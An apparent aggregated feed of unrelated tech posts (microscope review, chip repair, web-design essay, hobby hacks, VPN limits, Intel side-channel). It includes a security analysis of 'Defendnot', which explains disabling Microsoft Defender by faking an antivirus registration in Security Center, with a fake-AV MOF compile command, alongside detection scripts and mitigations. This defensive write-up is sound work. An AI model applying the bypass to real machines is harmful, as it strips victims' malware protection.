The whole thing comes in an unassuming Altoids-like tin. Inside the box are mostly accessories you may or may not need, like a lens cloth, a keychain, plastic pipettes, and the like. There are only three really interesting things: a strip of silicone with a glass ball in it, a slide container with five glass slides (three of which have something already on them), and a spare glass ball (the lens).
What I didn’t find in my box were cover slips, any way to prepare specimens, and — perhaps most importantly — clear instructions. There are some tiny instructions on the back of the tin and on the lens cloth paper. There is also a QR code, but to really get going, I had to watch a video (embedded below).
youtube.com/embed/Td62kPb24tU?…
What I quickly realized is that this isn’t a metallurgical scope that takes images of things. It is a transmissive microscope like you find in a biology lab. Normally, the light in a scope like that goes up through the slide and into the objective. This one is upside down. The light comes from the top, through the slide, and into the glass ball lens.
Bio Scopes Can Be Fun
Of course, if you have an interest in biology or thin films or other things that need that kind of microscope, this could be interesting. After all, cell phones sometimes have macro modes that you can use as a pretty good low-power microscope already if you want to image a part or a PCB. You can also find lots of lenses that attach to the phone if you need them. But this is a traditional microscope, which is a bit different.
The silicone compresses, which seems to be the real trick. Here’s how it works in practice. You turn on your camera and switch to the selfie lens. Then you put the silicone strip over the camera and move it around. You’ll see that the lens makes a “spotlight” in the image when it is in the right place. Get it centered and zoom until you can’t see the circle of the lens anymore.
Then you put your slide down on the lens and move it around until you get an image. It might be a little fuzzy. That’s where the silicone comes in. You push down, and the image will snap into focus. The hardest part is pushing down while holding it still and pushing the shutter button.
Zeiss and Nikon don’t have anything to worry about, but the images are just fine. You can grab a drop of water or swab your cheek. It would have been nice to have some stain and either some way to microtome samples, or at least instructions on how you might do that with household items.
Verdict
For most electronics tasks, you are better off with a loupe, magnifiers, a zoomed cell phone, or a USB microscope. But if you want a traditional microscope for science experiments or to foster a kid’s interest in science, it might be worth something.
For electronics, you are better off with a metallurgical scope. Soldering under a stereoscope is life-changing. We’ve seen more expensive versions of this, too, but we aren’t sure they are much better.
When Repairs Go Inside Integrated Circuits
What can you do if your circuit repair diagnosis indicates an open circuit within an integrated circuit (IC)? Perhaps the IC got too hot and internal wiring has come loose. You could replace the IC, sure. But what if the IC contains encryption secrets? Then you would be forced to grind back the epoxy and fix those open circuits yourself. That is, if you’re skilled enough!
In this video our hacker [YCS] fixes a Mercedes-Benz encryption chip from an electronic car key. First, the black epoxy surface is polished off, all the way back to the PCB with a very fine gradient. As the gold threads begin to be visible we need to slow down and be very careful.
The repair job is to reconnect the PCB points with the silicon body inside the chip. The PCB joints aren’t as delicate and precious as the silicon body points; those are the riskiest part, and if you make a mistake with them the repair will be impossible. Then you tin the pads, using solder for the PCB points and pure tin and hot air for the silicon body points.
Once that’s done you can use fine silver wire to join the points. If testing indicates success then you can complete the job with glue to hold the new wiring in place. Everything is easy when you know how!
Does repair work get more dangerous and fiddly than this? Well, sometimes.
youtube.com/embed/9y7xRpFYLjk?…
Thanks to [J. Peterson] for this tip.
The World Wide Web and the Death of Graceful Degradation
In the early days of the World Wide Web – when the Year 2000 and the threat of a global collapse of society were still years away – the crafting of a website on the WWW was both special and increasingly more common. Courtesy of free hosting services popping up left and right in a landscape still mercifully devoid of today’s ‘social media’, the WWW’s democratizing influence allowed anyone to try their hand at web design. With varying results, as those of us who ventured into the Geocities wilds can attest.
Back then we naturally had web standards, courtesy of the W3C, though Microsoft, Netscape, etc. tried to upstage each other with varying implementation levels (e.g. no iframes in Netscape 4.7) and various proprietary HTML and CSS tags. Most people were on dial-up or equivalently anemic internet connections, so designing a website could be a painful lesson in optimization and targeting the lowest common denominator.
This was also the era of graceful degradation, where we web designers had it hammered into our skulls that using and navigating a website should be possible even in a text-only browser like Lynx, w3m, or antique browsers like IE 3.x. Fast-forward a few decades and today the inverse is true, where it is your responsibility as a website visitor to have the latest browser and fastest internet connection, or you may even be denied access.
What exactly happened to flip everything upside-down, and is this truly the WWW that we want?
User Vs Shinies
Back in the late 90s, early 2000s, a miserable WWW experience for the average user involved graphics-heavy websites that took literal minutes to load on a 56k dial-up connection. Add to this the occasional website owner who figured that using Flash or Java applets for part of, or an entire website was a brilliant idea, and had you sit through ten minutes (or more) of a loading sequence before being able to view anything.
Another contentious issue was that of the back- and forward buttons in the browser as the standard way to navigate. Using Flash or Java broke this, as did HTML framesets (and iframes), which not only made navigating websites a pain, but also made sharing links to a specific resource on a website impossible without serious hacks like offering special deep links and reloading that page within the frameset.
As much as web designers and developers felt the lure of New Shiny Tech to make a website pop, ultimately accessibility had to be key. Accessibility, through graceful degradation, meant that you could design a very shiny website using the latest CSS layout tricks (ditching table-based layouts for better or worse), but if a stylesheet or some Java- or VBScript stuff didn’t load, the user would still be able to read and navigate, at worst in an HTML 1.x-like fashion. When you consider that HTML is literally just a document markup language, this makes a lot of sense.
Credit: Babbage, Wikimedia.
More succinctly put, you distinguish between the core functionality (text, images, navigation) and the cosmetics. When you think of a website from the perspective of a text-only browser or assistive technology like screen readers, the difference should be quite obvious. The HTML tags mark up the content of the document, letting the document viewer know whether something is a heading, a paragraph, and where an image or other content should be referenced (or embedded).
If the viewer does not support stylesheets, or only an older version (e.g. CSS 2.1 and not 3.x), this should not affect being able to read text, view images and do things like listen to embedded audio clips on the page. Of course, this basic concept is what is effectively broken now.
It’s An App Now
Somewhere along the way, the idea of a website being an (interactive) document seems to have been dropped in favor of the website instead being a ‘web application’, or web app for short. This is reflected in the countless JavaScript, ColdFusion, PHP, Ruby, Java and other frameworks for server- and client-side functionality. Rather than a document, a ‘web page’ is now the UI of the application, not unlike a graphical terminal. Even the WordPress editor in which this article was written is in effect just a web app that is in constant communication with the remote WordPress server.
This in itself is not a problem, as being able to do partial page refreshes rather than full page reloads can save a lot of bandwidth and copious amounts of sanity by preserving page position and avoiding flickering. What is a problem, however, is that there is no real graceful degradation amidst all of this any more, mostly due to hard requirements for often bleeding-edge features by these frameworks, especially in terms of JavaScript and CSS.
Sometimes these requirements are apparently merely a way to not do any testing on older or alternative browsers, with ‘forum’ software Discourse (not to be confused with Disqus) being a shining example here. It insists that you must have the ‘latest, stable release’ of either Microsoft Edge, Google Chrome, Mozilla Firefox or Apple Safari. Purportedly this is so that the client-side JavaScript (Ember.js) framework is happy, but as e.g. Pale Moon users have found out, the problem is with a piece of JS that merely detects the browser, not the features. Blocking the browser-detect-* script in e.g. an adblocker restores full functionality to Discourse-afflicted pages.
Wrong Focus
It’s quite the understatement to say that over the past decades, websites have changed. For us greybeards who were around to admire the nascent WWW, things seemed to move at a more gradual pace back then. Multimedia wasn’t everywhere yet, and there was no Google et al. pushing its own agenda along with Digital Restrictions Management (DRM) onto us internet users via the W3C, which resulted in the EFF resigning in protest.
Google Search open in the Pale Moon browser.
Although Google et al. ostensibly profess to have only our best interests at heart, features keep being added to Chrome, the very capable plugin system from the Netscape and Internet Explorer days has been taken out back, and WebExtensions Manifest V3 has been introduced (with the EFF absolutely venomous about the latter). Privacy concerns are mounting amidst worries that corporations now control the WWW, with even new HTML, CSS and JS features being pushed by Google solely for its own use in Chrome.
For those of us who still use traditional browsers like Pale Moon (forked from Firefox in 2009), it is especially the dizzying pace of new ‘features’ that effectively discourages us from using non-Chromium-based browsers, with websites all too often having only been tested in Chrome. Functionality in Safari, Pale Moon, etc. is often more a matter of luck, as today’s crop of web devs assumes that everyone uses the latest and greatest Chrome browser version. This ensures that using non-Chromium browsers is fraught with functionally defective websites, as the ‘Web Compatibility Support’ section of the Pale Moon forum illustrates.
The question is whether this is the web which we, the users, want to see.
Low-Fidelity Feature
Another unpleasant side-effect of web apps is that they force an increasing amount of JS code to be downloaded, compiled and run. This contrasts with plain HTML and CSS pages that tend to be mere kilobytes in size in addition to any images. Back in The Olden Days browsers gave you the option to disable JavaScript, as the assumption was that JS wasn’t used for anything critical. These days, if you try to browse with e.g. a JS-blocking extension like NoScript, you’ll rapidly find that there’s zero consideration for this, and many sites will display just a white page because they rely on a JS-based stub to do the actual rendering of the page rather than the browser.
In this and earlier described scenarios the consequence is the same: you must be using the latest Chromium-based browser to use many sites, you will be using a lot of RAM and CPU for even basic pages, and forget about using retro- or alternative systems that do not support the latest encryption standards and certificates.
The latter is due to the removal of non-encrypted HTTP from many browsers, because for some reason downloading public information from HTTP and FTP sites without encrypting said public data is a massive security threat now, and the former is due to the frankly absurd amounts of JS, with the Task Manager feature in many browsers showing the resource usage per tab, e.g.:
The Task Manager in Microsoft Edge showing a few active tabs and their resource usage.
For these tabs, there is no way to reduce their resource usage, no ‘graceful degradation’ or low-fidelity mode, meaning that older systems as well as the average smartphone or tablet will struggle or simply keel over trying to keep up with the demands of the modern WWW, with even a basic page using more RAM than the average PC had installed by the late 90s.
Meanwhile the problems that we web devs were moaning about around 2000, such as an easy way to center content with CSS, got ignored, while some enterprising developers have done the hard work of solving the graceful degradation problem themselves. A good example of this is the FrogFind! search engine, which strips down DuckDuckGo search results even further, before passing any URLs you click through a PHP port of Mozilla’s Readability. This strips out anything but the main content, allowing modern website content to be viewed on systems with browsers that were current in the very early 1990s.
In short, graceful degradation is mostly a matter of wanting to, rather than it being some kind of insurmountable obstacle. It requires learning the same lessons as the folk back in the Flash and Java applet days had to: namely that your visitors don’t care how shiny your website is, or how much you love the convoluted architecture and technologies behind it. At the end of the day your visitors Just Want Things to Work, even if that means missing out on the latest variation of a Flash-based spinning widget or something similarly useless that isn’t content.
Tl;dr: content is for your visitors, the eyecandy is for you and your shareholders.
Bypassing Microsoft Defender with Defendnot: Technical Analysis and Mitigation Strategies
In today's threat landscape, Defendnot is a sophisticated piece of malware capable of disabling Microsoft Defender by exploiting only legitimate Windows mechanisms. Unlike traditional attacks, it does not require elevated privileges, does not permanently modify registry keys, and does not raise immediate alerts from traditional defense software or EDR (Endpoint Detection and Response) solutions.
Defendnot's effectiveness lies in its ability to interface with the native APIs and security mechanisms of the Windows operating system, in particular:
- WMI (Windows Management Instrumentation)
- COM (Component Object Model)
- Windows Security Center (WSC)
2. Malware Execution Process
2.1 Abuse of the Windows Security Center (WSC)
The malware's core behavior consists of simulating the presence of an active antivirus through a fake registration in the WSC, causing Defender to disable itself automatically.
❝ Windows Defender disables itself if it detects another “compatible” antivirus properly registered on the system. ❞
This simulation is achieved by exploiting COM interfaces such as IWSCProduct and IWSCProductList, and by using PowerShell scripts or compiled code (e.g. C++).
2.2 Use of WMI and COM without Privilege Elevation
Defendnot does not modify GPOs, does not write to the registry, and does not kill processes. It operates stealthily thanks to:
- WMI Namespace: root\SecurityCenter2
- COM Object: WSC.SecurityCenter2
In many poorly configured corporate environments, these components can be invoked even by standard users, making the malware extremely dangerous in terms of lateral movement and persistence.
2.3 Injection and Persistence
In some cases, Defendnot can be injected into trusted processes (e.g. taskmgr.exe) or configured to run automatically via Task Scheduler or Run keys.
3. Practical Technical Examples
3.1 WMI Simulation via PowerShell
This kind of code is legitimate in itself, but it can be extended to register fake antivirus products with an “active and up to date” status, thereby forcing Defender to disable itself.
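As a harmless, read-only illustration of the WSC interface involved, the products currently registered in the Security Center can be enumerated with a simple query (a minimal sketch, assuming the standard root\SecurityCenter2 namespace; it only lists entries and registers nothing):
# List the antivirus products registered in the Windows Security Center (read-only).
Get-CimInstance -Namespace "root/SecurityCenter2" -ClassName "AntiVirusProduct" |
    Select-Object displayName, productState, pathToSignedProductExe, timestamp |
    Format-Table -AutoSize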
3.2 Advanced Spoofing in C++ (direct COM use)
This simulation is enough to deceive Defender and make it disable itself, in line with Microsoft's policy.
3.3 Checking Defender's Status via WMI (PowerShell)
This check queries the status of Microsoft Defender directly, which is useful for verifying whether it has been disabled in an anomalous way.
It is useful as a cross-check: if Defender turns out to be disabled and no known AV is actually active, spoofing or a bypass is likely.
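A minimal sketch of such a cross-check, assuming the built-in Defender PowerShell module is available on the host:
# Defender's own view of its state.
$defender = Get-MpComputerStatus
$defender | Select-Object AMServiceEnabled, AntivirusEnabled, RealTimeProtectionEnabled, AntivirusSignatureLastUpdated

# What the Security Center believes is installed, for a manual cross-check.
Get-CimInstance -Namespace "root/SecurityCenter2" -ClassName "AntiVirusProduct" |
    Select-Object displayName, productState, pathToSignedProductExe

if (-not $defender.RealTimeProtectionEnabled) {
    Write-Warning "Defender real-time protection is off: verify that the AV products listed above are legitimate."
}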
3.4 Fake AV Registration via WMI Spoofing (WMI MOF Injection – Theoretical)
A technique used in more advanced scenarios may include MOF injection to create fake providers directly in WMI (conceptual example):
Compiled with:
mofcomp.exe fakeav.mof
This technique is extremely stealthy and exploits WMI's ability to accept new persistent providers. It should be monitored carefully.
3.5 Real-Time WMI Event Monitoring (PowerShell + WQL)
A script can intercept suspicious changes to the SecurityCenter2 namespace, as sketched below.
This is particularly useful in corporate environments: it can be left running on sensitive servers or endpoints to track changes in real time.
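A minimal sketch of such a watcher (an illustrative sketch, not the original script; it assumes rights to subscribe to WMI events on the host, and the log path is just an example):
# Subscribe to creation/modification/deletion events for AV products registered in WSC
# and log every change with a timestamp.
Register-WmiEvent -Namespace "root\SecurityCenter2" `
    -Query "SELECT * FROM __InstanceOperationEvent WITHIN 10 WHERE TargetInstance ISA 'AntiVirusProduct'" `
    -SourceIdentifier "WscAvWatch" `
    -Action {
        $av  = $Event.SourceEventArgs.NewEvent.TargetInstance
        $msg = "{0}  WSC change detected: {1} (state {2})" -f (Get-Date), $av.displayName, $av.productState
        Add-Content -Path "C:\Temp\wsc-watch.log" -Value $msg   # example log path
    }
# Keep the session alive while monitoring; stop with:
# Unregister-Event -SourceIdentifier "WscAvWatch"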
3.6 Persistent Logging of Fake AVs via Task Scheduler (PowerShell)
An example of identifying tasks that launch bypass tools at startup is sketched below.
A simple scan of the scheduled tasks can reveal non-obvious persistence mechanisms, especially if the payload is a fake AV or an obfuscated loader.
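One possible sketch (the path patterns flagged here are illustrative assumptions, not indicators taken from the original analysis):
# Enumerate scheduled tasks and flag actions launched from unusual or user-writable locations.
$suspectPatterns = '\\AppData\\', '\\Temp\\', '\\ProgramData\\', '\.ps1', 'defendnot'   # illustrative patterns
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        $cmd = "$($action.Execute) $($action.Arguments)"
        if ($suspectPatterns | Where-Object { $cmd -match $_ }) {
            [pscustomobject]@{
                TaskName = $task.TaskName
                TaskPath = $task.TaskPath
                Command  = $cmd.Trim()
            }
        }
    }
} | Format-Table -AutoSize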
3.7 Inspecting the Defender Configuration via MpPreference
This makes it possible to spot anomalous changes or silent disablement, as sketched below.
If DisableRealtimeMonitoring is set, Defender has been turned off. UILockdown can also indicate manipulation by advanced malware.
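A minimal sketch, again assuming the built-in Defender module:
# Dump the Defender preferences most often touched by tampering tools.
Get-MpPreference |
    Select-Object DisableRealtimeMonitoring, DisableBehaviorMonitoring, DisableIOAVProtection, UILockdown, ExclusionPath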
3.8 Enumerating and Verifying the Modules Loaded in the WSC Process (C++)
Check that no anomalous DLLs are loaded into the Security Center process; a sketch follows.
Tools like Defendnot can be injected into the SecurityHealthService.exe process, and checking its loaded modules can reveal anomalous DLLs.
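The article frames this check in C++; as a rough PowerShell equivalent (a sketch only: it must run as administrator and may still fail against hardened or protected processes):
# Inspect the modules loaded by the Windows Security Center health service
# and flag any DLL that does not live under the Windows directory.
$proc = Get-Process -Name "SecurityHealthService" -ErrorAction SilentlyContinue
if ($proc) {
    $proc.Modules |
        Where-Object { $_.FileName -notlike "$env:windir\*" } |
        Select-Object ModuleName, FileName
} else {
    Write-Warning "SecurityHealthService.exe is not running."
}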
3.9 Identifying Fake AVs by Analyzing File Signatures
An example in PowerShell for analyzing the registered AV binaries is sketched below.
Fake AVs are often unsigned or carry self-signed certificates. This check can be integrated into automated audits.
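A minimal sketch, assuming the product paths registered in root\SecurityCenter2 point at real files (Defender itself registers a URI rather than a file path, so it will show up here as having no file):
# Check the Authenticode signature of every binary registered as an AV product in WSC.
Get-CimInstance -Namespace "root/SecurityCenter2" -ClassName "AntiVirusProduct" | ForEach-Object {
    $exe = $_.pathToSignedProductExe
    $sig = $null
    if ($exe -and (Test-Path $exe)) { $sig = Get-AuthenticodeSignature -FilePath $exe }
    $status = 'NoFileFound'
    $signer = 'n/a'
    if ($sig) {
        $status = $sig.Status
        if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
    }
    [pscustomobject]@{
        Product   = $_.displayName
        Binary    = $exe
        SigStatus = $status
        Signer    = $signer
    }
} | Format-Table -AutoSize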
4. Monitoring and Detection Scripts
To keep the best possible watch for anomalies, a centralized module can be run on the Windows host to get an overall view of:
- Defender status
- Registered AV products
- Anomalies in names/signatures
- Suspicious tasks linked to fake AVs
It is advisable to schedule this dashboard to run hourly via Task Scheduler, saving the output to log files or sending it by e-mail. It can also be integrated with a SIEM (Splunk, Sentinel, etc.) by forwarding the logs, and it can be extended with auto-remediation features, for example uninstalling or terminating suspicious AV products.
4.1 PowerShell: Detecting Anomalies in WSC
This script decodes the binary state of the registered AV providers and raises an alarm if it detects anomalies (e.g. generic names, unsigned or missing binaries); a sketch follows.
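A minimal sketch of that idea (the productState bit layout used here is a widely circulated community heuristic, not an officially documented format):
# Decode the WSC productState bitmask for each registered AV product.
# Heuristic: bit 0x1000 set = product enabled, bit 0x10 set = definitions out of date.
Get-CimInstance -Namespace "root/SecurityCenter2" -ClassName "AntiVirusProduct" | ForEach-Object {
    $state = [int]$_.productState
    $info  = [pscustomobject]@{
        Product  = $_.displayName
        RawState = ('0x{0:X6}' -f $state)
        Enabled  = (($state -band 0x1000) -ne 0)
        UpToDate = (($state -band 0x10) -eq 0)
        Binary   = $_.pathToSignedProductExe
    }
    if ($info.Enabled -and [string]::IsNullOrWhiteSpace($info.Binary)) {
        Write-Warning "'$($info.Product)' claims to be enabled but registers no binary path: possible fake product."
    }
    $info
} | Format-Table -AutoSize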
5. Mitigation and Defense Strategies
To contain and prevent the effects of malware such as Defendnot, a multi-layered approach is recommended:
5.1. Periodic WSC Monitoring
Automate the check on an hourly/daily basis and send alerts to a SIEM or via email.
5.2. Enable Tamper Protection
This blocks unauthorized changes to the Defender configuration, including changes made via WMI or PowerShell.
5.3. Apply Lock-down Policies
Use Group Policy to disable the option to turn off Microsoft Defender:
Computer Configuration > Admin Templates > Microsoft Defender Antivirus > Turn off Defender = Disabled
5.4. Access Control for WMI and COM
EDR tools must track suspicious access to:
- root\SecurityCenter2
- COM object WSC.SecurityCenter2
- Unsigned scripts accessing these components
5.5. Behavioral Detection with EDR
Advanced EDRs must be configured to:
- Detect anomalous registrations of AV providers.
- Intercept injections into trusted processes.
- Detect anomalous use of COM/WMI APIs from unsigned scripts.
6. Conclusions
The analysis of Defendnot makes us reflect on an increasingly relevant aspect of cybersecurity: sophisticated exploits or noisy malware are not necessarily required to compromise a system. In this case, the tool acts silently, leveraging the very rules and APIs that Windows provides for managing security software. And it does so cleanly enough to pass easily unnoticed, even by many EDRs.
What is striking is the simplicity and elegance of the attack: no registry changes, no need for elevated privileges, no malicious signature in the file. Just a false report to the Security Center, which believes it sees another active antivirus and therefore disables Defender, exactly as the operating system's logic dictates.
It is an important reminder: today, installing an antivirus is not enough to feel protected. We need visibility, continuous monitoring, and a healthy dose of distrust toward everything that looks “normal”. We also need to know tools like Defendnot in order to understand how modern attackers operate, often exploiting what the system allows rather than forcing it.
From a defensive standpoint, it is essential to:
- Harden security settings, for example by enabling Tamper Protection.
- Regularly monitor the state of the providers registered in the Security Center.
- Use tools that go beyond simple signatures or behavior, and that observe how system contexts and configurations change.
Ultimately, Defendnot is not just malware: it is a wake-up call. It shows that the most effective threats do not always come as “classic” malware, but often pass through the gray area between legitimate functionality and malicious use. And that is where we need to focus our defenses.
The article "Bypassing Microsoft Defender with Defendnot: Technical Analysis and Mitigation Strategies" originally appeared on il blog della sicurezza informatica.
DK 9x29 - Cose da Impero
On Trump's orders, Microsoft cut off the e-mail service of a British citizen, an employee of an international body based in The Hague, of which the USA is not a member. Clear proof that the European subsidiaries of US companies are a direct extension of American imperial power. European companies and institutions need to break free of them, and as soon as possible.
spreaker.com/episode/dk-9x29-c…
An Awful 1990s PDA Delivers AI Wisdom
There was a period in the 1990s when it seemed like the personal data assistant (PDA) was going to be the device of the future. If you were lucky you could afford a Psion, a PalmPilot, or even the famous Apple Newton — but to trap the unwary there were a slew of far less capable machines competing for market share.
[Nick Bild] has one of these, branded Rolodex, and in a bid to make using a generative AI less alluring, he’s set it up as the interface to an LLM hosted on a Raspberry Pi 400. This hack is thus mostly a tale of reverse engineering the device’s serial protocol to free it from its Windows application.
Finding the baud rate was simple enough, but the encoding scheme was unexpectedly fiddly. Sadly the device doesn’t come with a terminal because these machines were very much single-purpose, but it does have a memo app that allows transfer of text files. This is the wildly inefficient medium through which the communication with the LLM happens, and it satisfies the requirement of making the process painful.
We see this type of PDA quite regularly in second hand shops, indeed you’ll find nearly identical devices from multiple manufacturers also sporting software such as dictionaries or a thesaurus. Back in the day they always seemed to be advertised in Sunday newspapers and aimed at older people. We’ve never got to the bottom of who the OEM was who manufactured them, or indeed cracked one apart to find the inevitable black epoxy blob processor. If we had to place a bet though, we’d guess there’s an 8051 core in there somewhere.
youtube.com/embed/GvXCZfoAy88?…
PentaPico: A Pi Pico Cluster For Image Convolution
Here’s something fun. Our hacker [Willow Cunningham] has sent us a copy of his homework. This is his final project for the “ECE 574: Cluster Computing” course at the University of Maine, Orono.
It was enjoyable going through the process of having a good look at everything in this project. The project is a “cluster” of 5x Raspberry Pi Pico microcontrollers — with one head node as the leader and four compute nodes that work on tasks. The software for both node types is written in C. The head node is connected to a workstation via USB 1.1, allowing the system to be controlled with a Python script.
The cluster is configured to process an embarrassingly parallel image convolution. The input image is copied into the head node via USB, which then divvies it up and distributes it to n compute nodes via I2C, one node at a time. Results are given for n = {1,2,4} compute nodes.
It turns out that the work of distributing the data dwarfs the compute by three orders of magnitude. The result is that the whole system gets slower the more nodes we add. But we’re not going to hold that against anyone. This was a fascinating investigation and we were impressed by [Willow]’s technical chops. This was a complicated project with diverse hardware and software challenges and he’s done a great job making it all work and in the best scientific tradition.
It was fun reading his journal in which he chronicled his progress and frustrations during the project. His final report in IEEE format was created using LaTeX and Overleaf, at only six pages it is an easy and interesting read.
For anyone interested in cluster tech be sure to check out the 256-core RISC-V megacluster and a RISC-V supercluster for very low cost.
False Myth: If I Use a VPN, I'm Completely Safe Even on Open, Insecure WiFi Networks
Many people believe that using a VPN guarantees total protection while browsing, even on completely open and insecure WiFi networks. While VPNs are effective tools for encrypting traffic and preventing data interception, they cannot protect us from every risk.
In the article linked below, we explain in detail how a VPN (Virtual Private Network) works. It covers VPNs in depth, analyzing how they work and which specific benefits they offer, and describes the different types of VPN, the criteria for choosing the best solution, and the best practices for implementing one securely.
Virtual Private Network (VPN): Cos’è, Come Funziona e Perché
redhotcyber.com/post/virtual-p…
While confirming what that article states, namely that:
A VPN not only improves security and privacy, but also offers greater freedom and control over the information transmitted online, making it a fundamental tool for anyone who wants to protect their digital identity and sensitive data
it is essential to be aware of its limits and potential vulnerabilities.
For example, the vulnerability CVE-2024-3661, known as “TunnelVision”, shows how an attacker can redirect traffic outside the VPN tunnel without the user noticing. This attack abuses option 121 of the DHCP protocol to configure static routes on the victim's system, allowing traffic to be routed through insecure channels without the user being aware of it.
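As a rough way to spot something like this on a Windows client, the active routing table can be compared against the VPN interface; a minimal sketch, where the interface name is an assumption to adapt to your own setup:
# List IPv4 routes that are NOT bound to the VPN adapter.
# More specific routes win over the default route, so unexpected entries here
# (such as routes pushed via DHCP option 121) can pull traffic out of the tunnel.
$vpnAlias = "MyVPN"   # assumed name of the VPN network interface
Get-NetRoute -AddressFamily IPv4 |
    Where-Object { $_.InterfaceAlias -ne $vpnAlias -and $_.DestinationPrefix -ne '0.0.0.0/0' } |
    Sort-Object DestinationPrefix |
    Select-Object DestinationPrefix, NextHop, InterfaceAlias, RouteMetric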
While we can say that a VPN protects data in transit, we must remember that, for example, it does not:
- Block phishing attacks: a VPN cannot stop us from clicking on malicious links or entering our credentials on fraudulent sites.
- Protect against malware or attacks aimed directly at the device (local compromise): if our device is vulnerable or infected, a VPN offers no protection against malware, ransomware, or threats on local networks.
Evidence
1 - TunnelVision
This demo video presents a PoC of CVE-2024-3661 - Zscaler (TunnelVision), highlighting how an attacker can bypass the VPN tunnel by exploiting DHCP option 121:
youtube.com/embed/ajsLmZia6UU?…
Video by Leviathan Security Group
2 - A VPN with a Surprise
In this other article we show how, for example, several fraudulent LetsVPN websites share a common user interface and are deliberately designed to distribute malware, masquerading as the genuine LetsVPN application.
VPN Con Sorpresa! Oltre all’Anonimato, Offerta anche una Backdoor Gratuitamente
redhotcyber.com/post/vpn-con-s…
3 - Serious Vulnerabilities in VPN Protocols
In this other article, we discuss how some misconfigured VPN systems accept tunnel packets without verifying the sender. This allows attackers to send specially crafted packets containing the victim's IP address to a vulnerable host, forcing the host to forward an internal packet to the victim, which opens the door for attackers to launch further attacks.
In the article we also point out that the following CVEs have been identified:
- CVE-2024-7596 (generic UDP encapsulation)
- CVE-2024-7595 (GRE and GRE6)
- CVE-2025-23018 (IPv4-in-IPv6 and IPv6-in-IPv6)
- CVE-2025-23019 (IPv6-in-IPv4)
Gravi Vulnerabilità nei Protocolli VPN: 4 Milioni di Sistemi Vulnerabili a Nuovi Bug di Tunneling!
redhotcyber.com/post/gravi-vul…
Conclusions
VPNs are an important piece of the protection of our digital identity and of data in transit, but they do not offer complete protection against every threat. Like any security tool, they must be configured correctly, kept up to date, and used responsibly and with awareness.
In general, VPNs are neither a definitive nor a sufficient solution for security. It is essential to approach network security starting from the nature of the networks themselves: many infrastructures, open Wi-Fi networks in particular, are insecure “by design”.
In the next articles we will start exploring the technical measures that can be adopted to harden these networks, protect users, and reduce the risk of attacks, even in exposed or public environments.
➡️ Adopting a proactive security posture is essential: conscious use of a VPN should be just one of the tools in a broader, structured approach, which we will explore step by step in the upcoming articles on mitigations.
The article "False Myth: If I Use a VPN, I'm Completely Safe Even on Open, Insecure WiFi Networks" originally appeared on il blog della sicurezza informatica.
Cyber Outreach: The End of the One-Man Band? The Community Is the New Security
How relevant is the role of the community in creating informative content about cyber security? We could say it is all a matter of style.
Or of format. And of willingness.
There are those who favor a “let me explain it to you” approach. That becomes less and less credible when there is a tendency to present oneself as a know-it-all without ever acknowledging any contribution, merit, or inspiration from others. Moreover, the risk of sliding from cringe into cancer becomes rather significant.
Cyber security scenarios are a particularly complex multiverse, one that will demand increasingly varied skills and specializations, and above all will value every kind of experience. If knowing the fundamentals is always useful, knowing where we come from is not bad either. And no, it does not mean becoming necromancers of technology (necrotech?), but knowing the history of (in)security and its evolution over time.
Ci può essere spazio per l’illusione allucinatoria di una one-man-band?
Semmai, ci può essere un gruppo e un frontman. Come in un buon party c’è il face. Ma è un membro del party, per l’appunto. Chi può raccontare meglio una storia, divulgare, farla conoscere. Ma senza il supporto del gruppo sarebbe più nudo di quel Cyber Re che ritiene – errando – di poter silenziare il mondo. Ma prima o poi la realtà, che come ci ricorda Philip K. Dick ha la brutta abitudine di continuare ad esistere nonostante la nostra volontà di negarla, presenta il conto.
In short: the community is a mythical forge of ideas for anyone doing information and outreach work in the cyber field. That person, mind you, does not have to be an expert (note: nor should they present themselves as a mere “enthusiast” in an attempt to fake understatement), but they must have the respect to acknowledge the community’s role, along with the dignity of sources and credits, and the courage to use technical language without falling into the traps of trivialization. And they must resist the temptation to bow to the hype or the trend of the moment.
Building a good synergy with the community adds value to the information, a value the audience perceives, since readers’ or followers’ demand for information is what inevitably, over time, drives the supply. Greater digital literacy, which includes at least an awareness of technologies, of the dynamics of digital society, and of behavior, brings with it a demand for quality content that is interactive rather than spoon-fed without any search for feedback or interaction.
Since the spiritual currency being asked for is time and attention, relegating the audience to a passive role is not only disrespectful but a strategy doomed to fail in the long run. Maximum yield with a “wow effect”, but sooner or later saturation sets in.
On the contrary, giving readers the chance to take an active role and become part of the community is exactly that act of putting the human back at the center which is so often preached today and too rarely practiced. Especially when doing your part means giving up easy shortcuts.
Thanks to the community that is and that will be, though, it is still possible to resist sacrificing the quality of cyber information on the altar of algorithms and easy engagement levers.
The meme comes straight from the conclusion of my talk at the RHC Conference 2025.
The article Cyber Outreach: The End of the One-Man Band? Community Is the New Security comes from il blog della sicurezza informatica.
An Open-Source Wii U Gamepad
Although Nintendo is mostly famous for making great games, they also have an infamous reputation for litigiousness, not only over reasonable qualms like outright piracy of their games but also over grayer areas like homebrew development on their platforms or posting gameplay videos online. With that sort of reputation it’s not surprising that they don’t release open-source drivers for their platforms, especially those like the Wii U with unique controllers that are difficult to emulate. This Wii U gamepad emulator seeks to bridge that gap.
The major issue with the Wii U compared to other Nintendo platforms like the SNES or GameCube is that the controller looks like a standalone console and behaves similarly as well, with its own built-in screen. Buying replacement controllers for this unusual device isn’t straightforward either; outside of Japan Nintendo did not offer an easy path for consumers to buy controllers. This software suite, called Vanilla, aims to allow other non-Nintendo hardware to bridge this gap, bringing in support for things like the Steam Deck, the Nintendo Switch, various Linux devices, or Android smartphones which all have the touch screens required for Wii U controllers. The only other hardware requirement is that the device must support 802.11n 5 GHz Wi-Fi.
Although the Wii U was somewhat of a commercial flop, it seems to be experiencing a bit of a resurgence among collectors, retro gaming enthusiasts, and homebrew game developers. Many of its games were incredibly well made and are enjoying continued life on the Switch, yet plenty of gamers are looking for the original experience on the Wii U itself. If you’ve somehow found yourself in the opposite position of owning a Wii U controller but not the console, though, you can still get all the Wii U functionality back with this console modification.
Thanks to [Kat] for the tip!
A New Side-Channel Discovered in Intel Processors Allows Extraction of Secrets from the Kernel
Researchers at ETH Zurich have discovered an issue that threatens all modern Intel processors. The bug allows attackers to extract sensitive data from memory allocated to privileged system components, such as the operating system kernel.
These memory regions typically contain information such as passwords, cryptographic keys, the memory of other processes, and kernel data structures, so protecting them from leaks is essential. According to the researchers, protections against the Spectre v2 vulnerability have held up for about six years, but a new attack called Branch Predictor Race Conditions makes it possible to bypass them.
